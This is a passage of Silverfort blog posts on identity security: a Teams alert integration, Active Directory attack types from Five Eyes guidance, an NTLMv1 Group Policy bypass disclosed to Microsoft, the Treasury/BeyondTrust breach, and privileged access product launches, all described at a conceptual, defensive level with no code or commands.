incoming webhooks and adjust your Silverfort settings to send notifications based on pre-defined risk levels. With this configuration, Silverfort will push notifications to Teams whenever critical events occur in your environment. In these notifications, you will see detailed information about the incident that will help you quickly assess and respond to critical threats. Screenshots: Examples of real-time alerts that are sent in response to various events or triggers. These notifications are tailored to the specific circumstances of each event. A new approach to bridging authentication flows and incident visibility Silverfort’s integrations with Microsoft Teams open new possibilities for organizations to maintain and secure their hybrid environments. With authentication flows bridge and real-time alerts embedded directly into Teams, security teams can stay one step ahead of potential security threats and enforce strong security controls while keeping a seamless end user experience. Looking to learn how you can enforce identity controls in your hybrid environment? Schedule a call with one of our experts. --- - Published: 2025-01-20 - Modified: 2025-07-10 - URL: https://www.silverfort.com/blog/navigating-the-five-eyes-alliances-guide-to-detecting-and-mitigating-active-directory-compromises/ The Five Eyes Alliance, led by the Australian Signals Directorate (ASD), recently released a key document titled Detecting and Mitigating Active Directory Compromises, highlighting the rise in ransomware attacks on Active Directory environments, especially in the APAC region. In this blog, we'll examine some of the most common compromises described in the guidance, and highlight how Silverfort can help. What is the Detecting and Mitigating Active Directory Compromises Guidance? The guidance on Detecting and Mitigating Active Directory Compromises outlines common tactics, techniques, and procedures (TTPs) used by attackers to breach Active Directory infrastructure, and provides mitigation strategies. This guidance is a timely response to the growing reliance on identity threats in ransomware attacks in APAC, including some notable breaches:  The MediSecure Ransomware Attack (November 2023, Revealed July 2024) MediSecure, a digital prescription company based in Australia, experienced a ransomware attack last year that exposed health and personal information of nearly 13 million people. This also resulted in the company filing for insolvency. The breach appeared to originate from one of MediSecure's third-party vendors, suggesting the attackers may have gained access to MediSecure's data using compromised credentials. Port of Nagoya Ransomware Attack (July 2023) An attack attributed to the LockBit group disrupted trade and logistics in Port of Nagoya, the busiest shipping port in Japan - a major hub for car exports and an important engine for the Japanese economy. Two days were lost to the attack, which restricted the port's ability to receive shipping containers. While it has not been publicly disclosed how LockBit gained initial access, their ransomware strategy is typically based on phishing emails and purchasing stolen credentials. As soon as they gain access to the network, they move laterally, extract additional credentials, escalate privileges, broaden their access, and encrypt critical data. In this case, the Nagoya United Terminal System (NUTS), which manages container operations, was compromised. The ransom note left by the attackers claimed that data from NUTS had been encrypted and a ransom was demanded. The ICBC Attack (November 2023) The Industrial and Commercial Bank of China (ICBC), the world’s largest lender by assets, was hit by a ransomware attack directed at the bank's financial services division, U. S. ICBC Financial Services. It was reported that the attack had caused major disruptions to Treasury Trades. According to reports, the attackers gained unauthorized access to ICBC by exploiting a Citrix NetScaler ADC and NetScaler Gateway vulnerability named "Citrix Bleed". Exploitation of this vulnerability, warns CISA (the US Cybersecurity and Infrastructure Security Agency), "could allow for the disclosure of sensitive information, including session authentication token information that may allow a threat actor to 'hijack' a user’s session". Common AD Compromises Outlined in the Guidance While they outlined over 15 AD-related compromises, we’ll focus on some of the more common ones, namely Kerberoasting, AS-REP Roasting, Password Spraying, Unconstrained Delegation, and AD CS Compromise. Kerberoasting  What is Kerberoasting? Kerberoasting is exploiting the Kerberos authentication protocol. Specifically, Kerberoasting targets service accounts, exploiting the fact that any authenticated user can request Ticket Granting Service (TGS) tickets for any service. Attackers request TGS tickets associated with Service Principal Names (SPNs), then crack the encrypted tickets offline to get passwords. In this way, they can access restricted areas without being detected. How Silverfort Helps Detect and Protect Against Kerberoasting in Real Time Detection  Track service requests to users with SPNs, and detect Kerberoasting attacks using anomaly detection. Monitor suspicious MFA denials and virtual fencing violations to detect compromised credentials. Real-Time Protection Automatically deny service ticket requests identified as Kerberoasting  Enforce MFA policies for human accounts and virtual fencing for service accounts to prevent identity compromise. Overview of Kerberoasting (Source: Detecting and Mitigating Microsoft Active Directory Compromises) AS-REP Roasting What is AS-REP Roasting? Authentication Server Response (AS-REP) Roasting is an attack method targeted at user objects configured not to require Kerberos pre-authentication. If an attacker manages to crack an AS-REP ticket encrypted with a user's password hash, they can obtain the user's cleartext password and authenticate as the user. How Silverfort Helps Detect and Protect Against AS-REP Roasting in Real Time Detection Silverfort detects AS-REP requests without pre-authentication and flags suspicious authentication attempts. Monitor suspicious patterns of MFA denials and virtual fencing violations to detect successful AS-REP Roasting attempts. Real-Time Protection Set MFA policies for human accounts and virtual fencing for service accounts to defend against AS-REP Roasting. Automatically deny authentications without pre-authentication. Overview of AS-REP Roasting (Source: Detecting and Mitigating Microsoft Active Directory Compromises)  Password Spraying  What is Password Spraying?   In password spraying, attackers attempt to authenticate to multiple users using different combinations of passwords until they are successful. These passwords can come from public password lists, or identified as being reused in the target environment, or even the same password tried on multiple accounts.   How Silverfort Helps Detect and Protect Against Password Spraying in Real Time  Detection Detect brute-force attempts by tracking repeated authentication failures across multiple accounts. Monitor unusual activity involving built-in admin accounts, which are common targets for password spraying attempts.   Monitor enumeration of multiple SMB resources, a technique often used to discover credentials in unprotected file shares. Real-Time Protection The guidance describes MFA as an effective way to mitigate password spraying when attackers try to gain initial access, but once they've already gained access, it isn't as effective because they can then authenticate directly to the Domain Controller (DC) with the NTLM protocol, which does not support MFA.   While it is true that NTLM does not support MFA, it doesn't mean there is no way around it. Actually, there is, and it is part of our integration with Active Directory. Without requiring any changes, AD forwards every access request to us for a second opinion. This allows us to enforce MFA verification on any resource that uses AD, including legacy systems and on-prem infrastructure that use NTLM. Secure human accounts by implementing MFA, and service accounts with virtual fencing. Reduce the use of NTLM wherever possible, as well as NTLMV1, LDAP, and other weak protocols.   Enforce MFA verification policies for legacy protocols such as NTLM. Unconstrained Delegation  What is Unconstrained Delegation?   With unconstrained delegation, a computer object can impersonate any authenticated user and access any service. When a user object authenticates to a computer object with unconstrained delegation, a copy of the user's TGT is stored locally.   If an attacker gains local admin access to a computer configured for unconstrained delegation, they can extract the TGTs for any user object that has previously authenticated to the computer object. The attacker can then use these TGTs to impersonate other user objects in the domain, including domain admins.   How Silverfort Helps Detect and Protect Against Unconstrained Delegation in Real Time  Detection   Users' TGTs can be stolen if they authenticate to computers configured with unconstrained delegation. Use Deny/Notify/MFA policies to monitor computers with unconstrained delegation for suspicious MFA denials and virtual fencing violations.   Real-Time Protection Setup a Deny/MFA policy for authentications to computers with unconstrained delegation. Enforce MFA policies for human accounts and fencing for service accounts to prevent identity compromise.   AD CS Compromise  What is an AD CS Compromise?   AD CS (Active Directory Certificate Services) is used for the issuance and management of Public Key Infrastructure (PKI) certificates, which are commonly used for authentication purposes (as well as for other purposes, such as encryption and digital signing of documents, but this is not related to our topic). AD CS Certificate Authority (CA) offers a variety of certificate templates to help users and computers obtain certificates for various uses.   One of the most common AD CS compromises is exploiting misconfigured templates like ESC1. The ESC1 template allows any user to request a certificate on behalf of any other user. In this way, attackers are able to authenticate as that user and inherit their privileges.   How Silverfort Helps Detect and Protect Against AD CS Compromises in Real Time  Detection Silverfort monitors for suspicious authentications. Specifically, TGT requests in which a certificate was used. Real-Time Protection If certificate-based authentication is not widely used in your organization, limit its usage with a deny policy. Ensure MFA is enabled on human accounts and virtual fencing is enabled on service accounts. What's Next? The good news is that despite all the darkness, there is light, and all these compromises are indeed detectable and mitigateable. For each attack, there's a detailed counter-strategy, including limiting privileged access, enforcing strong authentication practices, and minimizing the risks of legacy protocols. Bottom line, dealing with Active Directory threats requires direct and active measures. It's all about identifying and preventing the mechanisms attackers use. Did anyone say "detecting and mitigating"? --- - Published: 2025-01-16 - Modified: 2025-04-01 - URL: https://www.silverfort.com/blog/ntlmv1-bypass-in-active-directory-technical-deep-dive/ Silverfort discovers an Active Directory Group Policy designed to disable NTLMv1 is easily bypassed due to a simple misconfiguration, allowing NTLMv1 authentications to persist. TL;DR  News: Silverfort’s research team discovered a new way for attackers to use NTLMv1 in attacks, despite efforts to disable it. Using a misconfiguration in on-prem applications, attackers can bypass the Group Policy designed to stop NTLMv1 authentications.   Why it matters: 64% of Active Directory user accounts regularly authenticate with NTLM, despite its known weaknesses and being deprecated by Microsoft. Many organizations attempted to solve the NTLMv1 problem with an Active Directory Group Policy. However, we discovered that this policy is flawed and allows NLTMv1 authentications to persist, creating a false sense of security and leaving organizations vulnerable. Attackers know NTLMv1 is a weak authentication protocol and actively seek it out as a method to move laterally or escalate privileges.   Who’s affected: Any organization who uses third-party or home-grown on-prem applications and those who do not strictly use Windows machines. For example, if a Mac computer connects to a bank application, they could be compromised. Impact to organizations: An attacker sitting on a network can see the NTLMv1 traffic and crack the users' credentials offline, leading to lateral movement and privilege escalation. Our POC emulates an application bypassing the fencing, validating this misconfiguration works to an attacker’s advantage.   Result of disclosure: While Microsoft Security Response Center (MSRC) indicated the NTLMv1 bypass is not a vulnerability, they took proactive measures to enhance security by announcing the complete removal of NTLMv1 within two months of our disclosure, starting with Windows 11 version 24H2 and Windows Server 2025.   We recently hosted a webinar where I took people through the research in more detail, showing how to mitigate NTLMv1 authentications in the absence of a patch. You can watch this webinar on demand here. Summary & Mitigations  Despite its historical significance, NTLM represents a considerable security liability. Its outdated cryptographic methods, well-documented weaknesses and lack of modern security features (such as MFA and server identity validation) make it an attractive target for attackers. NTLMv1 hashes can be intercepted and used for authentication relay attacks or even dictionary attacks, granting attackers unauthorized access to sensitive systems. New NTLM vulnerabilities have been disclosed over the last few months, including a zero-day. More recently, CyberSky discovered an NTLM vulnerability exploited by Russian threat actors as part of an attack chain that delivers the open-source Spark RAT malware. Many organizations proactively use Microsoft’s Group Policy mechanism to stop NTLMv1, believing this will protect them from insecure NTLMv1 authentications. However, our research shows on-prem applications can be configured to enable NTLMv1, negating the Group Policy LAN Manager’s highest authentication level set in Active Directory. Organizations think they are doing the right thing by setting this group policy, but it’s still being bypassed by the misconfigured application. Until applications cannot be configured to authenticate with NTLMv1, the problem will persist. At Silverfort, we’ve seen many attempts to authenticate via NTLMv1 across our customer base. We work closely with our customers to map and detect NTLMv1 usage and apply risk-based fencing to reduce the risk of compromise. Without a patch for NLTMv1, businesses that used NTLMv1 in the past should consider the following: Enable audit logs for all NTLM authentications in the domain.   Map all applications that use NTLM authentications in the first instance or as a fall back.   Detect vulnerable applications that request clients use NTLMv1 messages.   Fence all NTLM with a modern authentication method.   Technical deep dive: NTLMv1 bypass in Active Directory  NTLM (NT LAN Manager) is an old but widely used authentication mechanism commonly seen in Windows-based environments. Developed by Microsoft in the early 1990s, it was once the standard for authenticating users across a network, especially Microsoft’s Active Directory. However, despite being largely replaced by more secure protocols like Kerberos, NTLM continues to linger in legacy systems due to backward compatibility requirements. Measures were taken over the years to encourage the use of newer, more secure forms of authentication, such as blocking legacy NTLMv1 across the entire domain. In December of 2024, Microsoft announced the deprecation of NTLM active development. Even with these changes, questions remain. Do these actions create a more secure environment? Are we really getting closer to a complete removal of NTLMv1? Let's dive into the technical details.   NTLM 101  NTLM is an authentication mechanism used to verify a user's identity in Windows-based systems. NTLM consists of three messages: Negotiate, Challenge and Authenticate. The process begins with the client sending a Negotiate message to the server, indicating its intent to use NTLM for authentication and providing information about supported authentication options. The server then responds with a Challenge message, which includes a random number (the challenge) for the client to hash using its credentials. The client then sends the hashed response back to the server in the Authenticate message, which also includes the client's username, domain and session information. The server validates the response and, if successful, grants access to the requested resource. NTLM is often used as the underlying authentication mechanism in higher-level protocols like SMB (Server Message Block) or HTTP. While NTLM is a standalone authentication protocol, it is often referred to as a “mechanism” because it is frequently implemented as part of other protocols or systems to provide authentication. Figure 1: Simple NTLM Authentication  NTLMv1 vs NTLMv2  NTLMv1 was first introduced in 1993. Security awareness at this time was low and NTLM was designed accordingly. Encryption, the first security mechanism, was in its infancy and only DES was supported. The second mechanism, the challenge, only consisted of an 8-byte server challenge. This number of random bytes was easier to guess in terms of breaking the cipher and discovering the user’s credentials. The last mechanism missing in the first version of NTLM was specifying the source and destination of the NTLM authentication. This very quickly led to the infamous attack method NTLM Relay, which positioned the adversary between the client and the server. If an NTLMv1 message was caught, it could be then used to reauthenticate the adversary to the application and even reuse it with a different protocol. For example, by transitioning NTLM authentication over SMB to NTLM over LDAP. The second version of NTLM – NTLMv2 – introduced mitigations for many of the security weaknesses detailed above. The first was the upgrade of the encryption method with the use of RC4, which strengthened the cipher and made it harder to brute-force. The second was the addition of the Client Challenge, which added another source of entropy to the computation of the cipher. The last and biggest modification to NTLM was the AV_PAIRS. This added extra fields to the NTLM Authenticate message, such as source client, destination server, domain and even SPN, which are a few of the fields that create a unique session key for every authentication. This protection made it difficult to perform relay attacks.   Netlogon to evaluate NTLM  The last piece of the puzzle is that the application server in Active Directory cannot evaluate the NTLM message on its own, simply because it does not have the user’s credentials stored. Instead, Microsoft uses the RPC Netlogon interface to evaluate the NTLM message remotely. The server must attach the NTLM message to the NetrLogonSamLogonEx function alongside the NTLM challenges. If the Domain Controller successfully recreates the message using the user’s stored credentials, then it will return success and follow the user’s Privilege Access Certificate (PAC) to perform authorization and a matching session key. If the evaluation failed, it would respond with the corresponding error.   Figure 2: NTLM Authentication in Active Directory  NTLMv1 disclosure  The Group Policy mechanism is Microsoft’s solution to disable NTLMv1 across the network. The LMCompatibilityLevel registry key prevents the Domain Controllers from evaluating NTLMv1 messages and returns a wrong password error (0xC000006A) when authenticating with NTLMv1. This should eliminate NTLMv1 completely and require all application servers to provide NTLMv2. Does this eliminate NTLMv1? Let’s take a look. Figure 3: Reject NTLMv1 with GP enabled  NTLMv1 bypass  MS-NRPC is the specification of the Netlogon remote interface which describes all of its structures and functions. The NetrLogonSamLogon and its variants (NetrLogonSamLogonEx and NetrLogonSamLogonWithFlags) oversee passing the NTLM message from the server to the Domain Controller securely for evaluation. The function structure requires identity information to be passed alongside the NTLM message. As defined in section 2. 2. 1. 4. 15, the NETLOGON_LOGON_IDENTITY_INFO contains many fields such as domain name, username, workstation, and others. One interesting field is the ParameterControl. If we look at its flags, we can see that in the O value, it states, “Allow NTLMv1 authentication (MS-NLMP) when only NTLMv2 (NTLM) is allowed. ” Figure 4: A Screenshot of MS-NRPC documentation ParameterControl Flag Page 65.   I wondered whether Microsoft really allows applications to use NTLMv1 when it is disabled. After building the data structure and simulating a malicious application, I discovered this flag bypasses the Group Policy that prevents using NTLMv1 authentication across the network.   Figure 5: Bypass the NTLMv1 Group Policy.    So how does this impact the elimination of NTLMv1?   Applications that request clients to generate NTLMv1 will still be able to do so, even if the Group Policy is activated. It is important to note that Windows clients with LMCompatibilityLevel 3 and above will not generate NTLMv1 if requested. However, non-Windows clients are not protected. If an application requests an NTLMv1 message from a non-Windows client, the Domain Controller may approve the authentication and generate a session key. We use applications in our customer networks that attempt to use NTLMv1 even if the relevant Group Policy is activated. Because of this bypass, you cannot tell if a vulnerable application is fully mitigated. While many organizations attempt to discover all NTLMv1 use, they may not even be aware that some applications are still using NTLMv1.   What should I do to fully mitigate? Enable audit logs for all NTLM authentications in the domain.   Map all applications that use NTLM authentications in the first instance or as a fall back.   Detect vulnerable applications that request clients to use NTLMv1 messages.   Fence all NTLM with a modern authentication method.   Silverfort’s Unified Identity Security Platform detects and protects all NTLM authentications. Our ITDR module can detect NTLMv1 applications and perform risk-based modern fencing to all vulnerable applications. Disclosure Process  While MSRC indicated that the NTLMv1 bypass was not classified as a vulnerability, they took proactive measures by announcing the complete removal of NTLMv1 starting with Windows 11 version 24H2 and Windows Server 2025. The issue was reported on September 30th, 2024, and their response aligned with the official removal announcement in November 2024. By addressing legacy risks and phasing out outdated protocols, Microsoft demonstrates a strong commitment to enhancing security with a forward-thinking approach. This step underscores the importance of safeguarding systems with modern, secure alternatives like SSO or Kerberos and showcases how responsible reporting can contribute to meaningful improvements.   Want to learn more? Watch our on-demand webinar If you want to dive into the detail around this research, check out this on-demand webinar, where I walked through how to mitigate NTLMv1 authentications in the absence of a patch. --- - Published: 2025-01-13 - Modified: 2025-02-26 - URL: https://www.silverfort.com/blog/the-treasury-department-cyberattack-key-insights-on-beyondtrust-remote-support-software-hack/ TL;DR  The U. S. Department of the Treasury was targeted in December 2024 by a cyberattack attributed to a Chinese state-sponsored Advanced Persistent Threat (APT) group.   Hackers exploited command injection vulnerabilities (CVE-2024-12356 and CVE-2024-12686) in third-party vendor BeyondTrust’s remote support software.   Attackers gained unauthorized remote access to Treasury workstations, retrieving unclassified documents.   BeyondTrust’s software served as the entry point, but Treasury systems were the focus.   Just like endpoint and cloud, you need to protect your identity infrastructure. Augment your identity security and prevent incidents like this with risk-based access management and enhanced privileged access security.   *** In December 2024, the U. S. Department of the Treasury fell victim to a sophisticated cyberattack orchestrated by a Chinese state-sponsored APT group. These groups are known for targeting government entities, critical infrastructure and private sector organizations to steal intellectual property and conduct espionage.   Entry point: Vulnerable remote support software  The attackers exploited two command injection vulnerabilities (CVE-2024-12356 and CVE-2024-12686) in BeyondTrust’s remote support software. This software is commonly used for remote access and IT support, making it a high-value target. The attackers used the vulnerabilities to bypass authentication, execute unauthorized commands and gain control over connected systems. Using a stolen API key, the hackers accessed Treasury workstations, retrieved unclassified documents and potentially probed other parts of the network.   Tactics point to Chinese state-sponsored APT group  The attack has been attributed to an unnamed Chinese state-sponsored APT group, though China denies involvement. Chinese APT groups have a history of:  exploiting software vulnerabilities for persistent access  conducting espionage campaigns against government and defense sectors targeting intellectual property from industries like technology and energy.   This breach aligns with previous tactics employed by China state-sponsored APT groups to exploit third-party vulnerabilities and leverage them for broader network infiltration.   Impact and lessons learned  The breach was limited to unclassified Treasury systems, with no evidence of classified data exposure. However, it underscores the importance of reducing your identity attack surface with a defense-in-depth strategy that layers proven security controls over third-party software; for example, MFA or automated privileged access security. This will help you address vulnerabilities swiftly while also placing multiple lines of defense around your privileged access and identities. If you are assessing your vulnerability to this attack and the APT group’s known tactics, here are a few things you can do: Transition to risk-based access management and enhanced privileged access security (PAS).   Add a PAS layer to your PAM (Privileged Access Management) practice from different vendors. Conduct regular vulnerability assessments and always patch vulnerabilities/fix requirements in third-party software quickly.   Implement zero-trust architecture and MFA.   Continuously monitor for threats and anomalies around privileged identities; in other words, make sure your SOC or MDR increases the sensitivity level around privileged identities and has all the data and controls to rapidly stop takeovers. This incident serves as a critical reminder of the risks posed by supply chain vulnerabilities and the need for proactive cybersecurity measures. Request a demo to discover how to augment your identity security and prevent incidents like this.   --- - Published: 2025-01-08 - Modified: 2025-03-05 - URL: https://www.silverfort.com/blog/introducing-the-silverfort-integration-hub-a-new-era-for-hybrid-and-cloud-identity-security/ Silverfort is excited to announce the launch of our Integration Hub, a Silverfort cloud service that seamlessly connects your Silverfort deployment—whether on-premise, in the cloud, or hybrid—with third-party systems. The Integration Hub empowers organizations to stay ahead of Identity Security risks by enabling real-time communication and automation between Silverfort and a wide range of external tools. With the Integration Hub, administrators can be instantly alerted to threats in real-time and take swift action, all while ensuring that their security ecosystem operates cohesively.   The Integration Hub is designed to provide a flexible, scalable, and future-ready solution for building a more integrated security stack. Whether you want to enhance identity protection or improve coordination across your security tools, the Silverfort Integration Hub simplifies complex integrations and empowers organizations to take a proactive approach to Identity Security.   Key Capabilities of the Silverfort Integration Hub  Real-Time Notifications  The Integration Hub allows Silverfort to connect with notification systems, ensuring administrators receive instant alerts about any threats detected by Silverfort. Now, security practitioners can consume Identity Security alerts in the systems they are already using, enabling faster and more effective responses to critical security events.   XDR and EDR Risk Integration  The Integration Hub will expand in 2025 to support integration with Extended Detection and Response (XDR) and Endpoint Detection and Response (EDR) platforms. This will enable bi-directional communication, allowing Silverfort to both ingest third-party risk data and share identity-based threat insights. This real-time collaboration will enhance an organization’s ability to prevent lateral movement and contain threats across the network and endpoints.   Shared Signals Framework (SSF) for Seamless Communication  Also set for release in 2025, the Shared Signals Framework (SSF) will allow Silverfort to exchange security signals with other platforms in real-time. By adopting this open standard, Silverfort ensures streamlined, consistent communication between systems, making it easier to share and act on security events like compromised accounts, compliance violations, or suspicious authentication attempts.   Expanding Integration Beyond Notifications and XDR  The Silverfort Integration Hub builds on existing integrations, such as with Splunk and Microsoft Sentinel in the SIEM space. While Silverfort already provides powerful identity-based insights to these platforms, the Integration Hub opens the potential for even more advanced use cases. It will allow deeper integrations, enabling more robust two-way communication, closed-loop workflows, and expanded capabilities across various security systems.   Beyond SIEM, the Integration Hub is designed to connect with a variety of security tools to ensure seamless communication across your security stack:  Identity and Access Management (IAM) Providers  Bi-directional integration with IAM systems allows Silverfort to receive risk signals and respond by enforcing identity-specific policies, such as blocking suspicious sessions or enforcing multi-factor authentication (MFA). This ensures continuous monitoring and real-time response to identity-related threats across the enterprise.   Identity Governance and Administration (IGA) Systems  Silverfort’s unique position as a layer on top of identity providers like Active Directory, Entra ID, Okta, and many more gives the Silverfort platform privileged insights into how identities are being used to access applications. These insights allow Silverfort to provide IGA systems with real-time data, helping them make better, more informed decisions during access reviews. By integrating Silverfort’s continuous visibility and identity activity monitoring, IGA solutions can ensure access rights align with identity behavior and risk profiles.   Security Orchestration, Automation, and Response (SOAR) Systems  Silverfort can integrate with SOAR platforms to automate incident response workflows. Silverfort can trigger automated actions when a threat is detected, such as isolating compromised accounts or enforcing additional security layers, reducing the time and effort required to respond to incidents.   Incident Response Systems  Silverfort feeds identity-related intelligence into incident management processes by connecting to incident response platforms. This integration allows teams to quickly isolate compromised accounts, prevent further unauthorized access, and reduce the overall impact of security incidents.   Unlocking New Possibilities with the Integration Hub  The Silverfort Integration Hub is available now, and all customers need to do to unlock this powerful feature is upgrade to Silverfort version 5. 1. 2. Once upgraded, Silverfort will be able to release new integrations without requiring customers to update their platform version, making it easier to access future integrations and new features. Check out the Ecosystem Documentation to stay up to date with the available integrations. If your organization has specific systems or vendors you would like Silverfort to work with, please email us at ecosystem@silverfort. com. Your feedback helps us continually expand our network or technology partners and our integration capabilities.   --- - Published: 2024-12-11 - Modified: 2025-02-26 - URL: https://www.silverfort.com/blog/secure-your-privileged-accounts-with-silverfort/ Due to the distinct security blindspots associated with PAM solutions, protecting privileged accounts has become a daunting task for most organizations. These blind spots include lengthy deployment cycles and manual account discovery delays in identifying privileged accounts. At the same time, gaps in enforcing least privilege access and preventing admins from bypassing security controls leave organizations vulnerable to compromise.   Simply managing privileged accounts is not sufficient—without implementing concrete security controls for these accounts, the sheer volume of access pathways, users, and entitlements can quickly spiral out of control. In order to truly protect which users should be granted access to the organization's crown jewels, we must rethink how privileged access is secured to ensure that it does not become a gateway to attackers.   In this post, we will show the different capabilities you can gain from Silverfort’s newly launched Privileged Access Security (PAS) module. We will explain how Silverfort enables you to secure your privileged accounts easily through automated discovery and classification, fencing, and enforcing least privilege and Just-In-Time (JIT) access policies for all your privileged users. The Privileged Access Blind Spots 101  The traditional approach to managing privileged accounts with PAM solutions focuses on controlling and monitoring who has access, but it does not take into account the significant limitations that leave these accounts exposed. The limitations of PAM solutions create blind spots in an organization's identity security posture, making it easier for attackers to navigate across an organization's environment without being noticed.   What are the limitations of traditional PAM solutions that organizations need to overcome?   Slow and Complex Onboarding: According to Osterman Research, only 10% of organizations successfully complete their PAM projects, often due to the time and resources required to onboard all systems and accounts. This incomplete coverage leaves many privileged accounts unmanaged and vulnerable to compromise, creating gaps attackers can easily target.   Discovery Gaps: Traditional PAM tools struggle to identify all privileged accounts, users, and the systems they access. These unknown or unmonitored accounts become hidden entry points for attackers, who exploit them to escalate privileges and move laterally across environments.   Bypassing PAM: Administrators often get around PAM by directly checking out credentials or accessing servers without using PAM workflows. This undermines the protections PAM provides, leaving a trail of unmonitored activity that attackers can replicate or exploit to avoid detection.   Privileged Access Abuse: Misuse of privileged accounts, such as using elevated access for non-critical tasks, expands the attack surface. When these accounts are overused or used improperly, it increases the risk of compromise and makes it harder to detect malicious activity amid legitimate actions.   These blind spots weaken traditional PAM solutions, making it easier for attackers to bypass controls and compromise critical systems. Organizations need to deploy a more proactive approach that goes beyond managing their privileged accounts and instead emphasizes security above all. Silverfort’s Privileged Access Security (PAS)  Silverfort offers a new approach to overcoming the limitations of traditional PAM solutions through its unique architecture, which integrates directly with Active Directory.   Silverfort automatically discovers and classifies all privileged accounts based on user activity. This enables organizations to gain comprehensive visibility into all privileged accounts, cross-tier authentications, and access requests to identify whether regular accounts are being used with privileged intent.   With Silverfort's PAS, organizations can implement Just-in-Time (JIT) access policies to ensure that privileged accounts only receive the necessary permissions when needed and for a limited duration. Implementing these controls allows organizations to improve their security posture while achieving zero standing privileges at scale.   Silverfort uses a three-step approach to secure privileged accounts:  Discover and classify all your privileged accounts.   Fence privileged accounts to their intended purpose.   Enforce frictionless Just-in-Time (JIT) access policies at scale.   Automated Discovery and Classification  The first step to properly securing all privileged accounts is understanding exactly who your privileged users are and what they are accessing. Here are several key questions to consider:  What privileged accounts do you have?   How many privileged accounts do you have?   Which assets or systems are these accounts accessing?   These questions are answered when you deploy Silverfort’s PAS. The discovery and classification step is initiated when an organization connects its domain controllers to Silverfort. This allows Silverfort to automatically discover, identify, and classify all privileged accounts based on the actual user activity and authentications. Organizations gain comprehensive visibility into all privileged accounts and their access requests to critical resources to identify whether these accounts are being used with privileged intent.   Silverfort also classifies different privileged user tiers based on their actual activity and helps organizations prioritize and implement tailored security controls for each tier. By monitoring account behavior, Silverfort detects and alerts on risky cross-tier access attempts, enabling organizations to proactively address privilege escalation threats.   Fence Privileged Accounts to Their Intended Purpose  Once full visibility and insight into all privileged accounts is achieved, the next phase is to configure a virtual fence for these accounts to ensure they are used for their intended purposes.   Silverfort’s fencing capabilities provide organizations with strong security control over privileged accounts by restricting their access to the specific resources that require high privileges, while any unnecessary or unauthorized access to other resources is automatically blocked.   To further reduce risk, Silverfort limits the use of privileged accounts to predefined sources, destinations and protocols, thereby reducing the possibility of misuse and lateral movement. By detecting and preventing privilege escalation and cross-tier access attempts, Silverfort ensures strict role segmentation is applied and protects against unauthorized activities.   What sets Silverfort apart is its ability to automatically recommend tailored least privilege policies based on real account usage patterns. These policies specify exactly where and how privileged accounts should be used, and the approved access rules for each account. This automation not only simplifies implementation but also significantly reduces the attack surface, ensuring privileged accounts are only used within their intended parameters. Seamless Just-In-Time Access  Configuring and applying time-sensitive Just-In-Time access policies is the final step in completely securing all your privileged users.   Using Silverfort's JIT capabilities, organizations can render accounts completely unusable until access is explicitly required. This approach significantly reduces the attack surface and ensures that privileged accounts remain secure when not actively in use. Through the removal of unnecessary standing privileges, Silverfort minimizes overexposure and enforces strict access controls.   JIT policies are easy to create in the Silverfort console under the PAS screen, where you can simply design frictionless access policies for each user and assign the duration of their access. Admins may select the type of authentication and, if MFA is selected, which MFA token needs to be activated.   Implementing JIT policies with Silverfort reduces the need for outdated and complex security controls, such as password rotation and vaulting, which are often time-consuming and difficult to implement. As a result, access rights are granted dynamically and only when necessary, aligning security with efficiency.   Learn More About Silverfort’s Privileged Access Security  With Silverfort's newly launched Privileged Access Security (PAS) module, all privileged users are secured with real-time security controls. By automating the discovery and classification of privileged accounts, enforcing least privilege principles and enabling Just-In-Time (JIT) access policies, Silverfort empowers you to secure privileged access with unprecedented ease and efficiency.   Looking to learn how you can change the way you secure privileged access? Please join us for our PAS webinar with The Hacker News or reach out to one of our experts here. --- - Published: 2024-12-09 - Modified: 2025-02-26 - URL: https://www.silverfort.com/blog/silverfort-launches-privileged-access-security-to-solve-gaps-left-by-pam/ Today we’re proud to introduce another important milestone in Silverfort’s journey to build the world’s leading unified identity security platform. The same paradigm shift we’ve previously applied to MFA, Non-Human Identity (NHI) protection, ITDR and more, is now applied to address one of the most critical challenges of identity security – securing privileged access with our new Privileged Access Security (PAS) product.   It’s time to rethink the security of privileged access. Entering 2025, it’s easy to see that identity security has become the top of mind for organizations’ security leaders. In light of the evolving identity threat landscape, in which credential compromise for malicious access is a pillar in almost every attack, leaders are compelled to reevaluate the traditional identity security methods that are no longer efficient enough – and PAM solutions are high on the list.   Why the current ways to protect privileged users are not enough.   Every hands-on identity security practitioner would be the first to agree that relying exclusively on the traditional PAM approach to guard administrative access is bound to leave security gaps. Endless onboarding cycles, challenge in discovery of all privileged accounts, and frequent bypasses by admins, are some of the prominent issues organizations struggle with. The result is that PAM protection is rarely applied to all privileged accounts, and too many are left temporarily or even permanently exposed.   Envision a privileged access security solution that overcomes the gaps of traditional PAM.   Our task when attempting to tackle this important challenge was to build a solution that addresses the following needs: from the operational aspect, rapid deployment and onboarding, covering all privileged accounts. From the security aspect, the ability to enforce secure access for all privileged users, with Least Privilege and Just-In-Time (JIT) access policies.   To achieve these goals, we had to zoom out of how PAM solutions were built so far (which is still based on architecture designed decades ago) and look for an alternate approach. One might say that our aim wasn’t to build a better PAM, but to fundamentally rethink how the objectives that PAM solutions aim for can be better achieved in an alternative manner. Silverfort Privileged Access Security (PAS): Go beyond protecting privileged accounts. Secure them.   At the core of Silverfort lies the innovative technology and architecture in which our platform integrates with the different pieces of the IAM infrastructure, becoming an inline component of the authentication and authorization process. This enables us to see, monitor, and enforce identity security controls in real time on 100% of the access requests that take place within the various identity providers (IdPs) in the environment. So, we’ve turned our efforts to use these capabilities for the purpose of protecting privileged access:  Rapid deployment and onboarding: If Silverfort is already in place no additional installation is required, and the Privileged Access Security capabilities can be enabled immediately. If not, Silverfort can be deployed in most organizations in a matter of hours or days (unlike traditional PAM solutions which take months or even years to deploy and onboard). Automated discovery: Silverfort already sees every authentication and access attempt, as well as the configuration of the IAM infrastructure. As such, it can not only identify the users that are members of the admin groups, but – more importantly – identify the users that access sensitive resources, practically exercising admin access without being officially defined as such. Silverfort can also identify all the sources and destinations in which a privileged account is being used. Enforcement of Least Privilege access, with “Virtual Fencing”: Silverfort can interject in any authentication process and inform the identity provider whether to allow access or block it. This allows organizations to ensure that privileged accounts are used only within their intended purpose, and that no one can abuse them for any other access. Just-In-Time (JIT) access: We’ve enhanced our technology with the ability to disable any administrative account, and only enable it for short period of time when it’s actually needed, upon a verified access request by an authorized user. Admin bypass resiliency: The admin’s user experience when accessing resources stays intact and is not subject to any change. Silverfort’s security controls are enforced inline through its integration with the IAM infrastructure (e. g. , Active Directory), regardless of how the admin tries to access the resource. In practice, it means that no admin can bypass the protection of 